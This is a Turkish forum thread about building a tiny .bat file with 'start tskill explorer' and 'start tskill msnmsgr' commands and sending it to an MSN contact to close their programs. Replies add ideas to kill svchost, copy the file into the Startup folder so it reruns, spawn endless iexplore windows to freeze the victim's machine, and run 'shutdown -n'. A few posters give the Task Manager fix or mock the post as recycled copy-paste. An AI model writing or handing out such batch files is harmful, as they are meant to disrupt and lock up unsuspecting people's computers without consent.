Msn İ Kapamak Programları Sonlandırmak
-
karşıdakinin bütün programlarını sonlandırmakmı istiyorsunuz? hemde virus yollamadan sadece 1 kb lık bir program yollayarak bütün programlarını sonlandırabilirsiniz nasılmı?
start tskill explorer
start tskill msnmsgrbu kodları note pad e yazarak farklı kaydet seçeneğini seçin ve uzantısını .bat olarak belirleyin işte sonlandırıcımız hazır...
sadece msn in kapanmasını istiyorsanız
start tskill msnmsgr yazın sadece
msn in çok kapalı kalmasını istiyorsanız
start tskill msnmsgr bu kodu bi kaç kez yazınSaygılar...
-
Görev Yöneticisi ,yeni görev çalıştır "explorer" makine normale döner :)
-
tamamda bunu karşıyada yollayabilirsin:D
edit: karşı tarafa yolladığınızda sadece 1 kb 1 saniyede gider ve hiç bir virüs şeysi içermez...
-
start tskill svchost yazsak
bunuda açıncan kendini "C:\Documents and Settings\All Users\Start Menu\Programlar\Başlangıç" klasörüne kopyalicek bişe yapsak adamı gıcık eder ama kopyalama işini nası yapcaz bilen biri sölesin :Dbide bekleme süresiyle oynayabilirmiyiz
-
orasınıda sen bul mesela sürekli start iexplore yaparsan karşıdaki makinayı fena kasar arkası arkaya yaz start iexplore diye sürekli yeni web sayfası açar kaçtane yazdıysan
-
onu yapıcağına "shutdown -n" yap (tırnaklar hariç) adamın pc yi kapa lütfen böle iskorpicx in kullandığı şeyleri paylaşmayalım
-
iskorpicx le ne alaka adam web e girio onada girmeyelim ozaman
-
ercag bunu yazdı:
-----------------------------
iskorpicx le ne alaka adam web e girio onada girmeyelim ozaman
-----------------------------
isko lamerlerin babası.sende diğer sözde hack sitelerinden c/p yapıyorsunsana alternatif yol söylüyorum "shutdown -n" yaz adamın pc kapansın
-
c/p yapmadım tamamen kendim yazdım hepsini ara bul aynı yazıyı ben bidaha internete girmem ok?
-
http://tahribat.com/forumdisplayfolder.asp?highlight=&folderid=33507
msn ile ilgili sorunum vardı burdaki konu'da mesaj yazdım yeni konu açmak istemedim ana sayfaya bakıyorum mesaj yazdıgım konu yok ama bu konu görülüyor nasıl olur ya felan dedikten sonra sonra jeton düştü:) msn mirc..vs forum'da acılan konular anasayfa'da cıkmıyormuş
Tahribat.Com - Açık Kapılar Önünde
msn i kapamak programları sonlandırmak
:)
-
http://www.orijinalforum.com/forum_posts.asp?tid=919 2006 da yazilmis :)
her forumda enaz 1 kere olmak uzere yayinlanmistir bu sacmalik.ya arkdaslar burada cok mesaj yazana falan yildiz vermiyorlar boyle gereksiz c/p ile forumu kirletmeyin....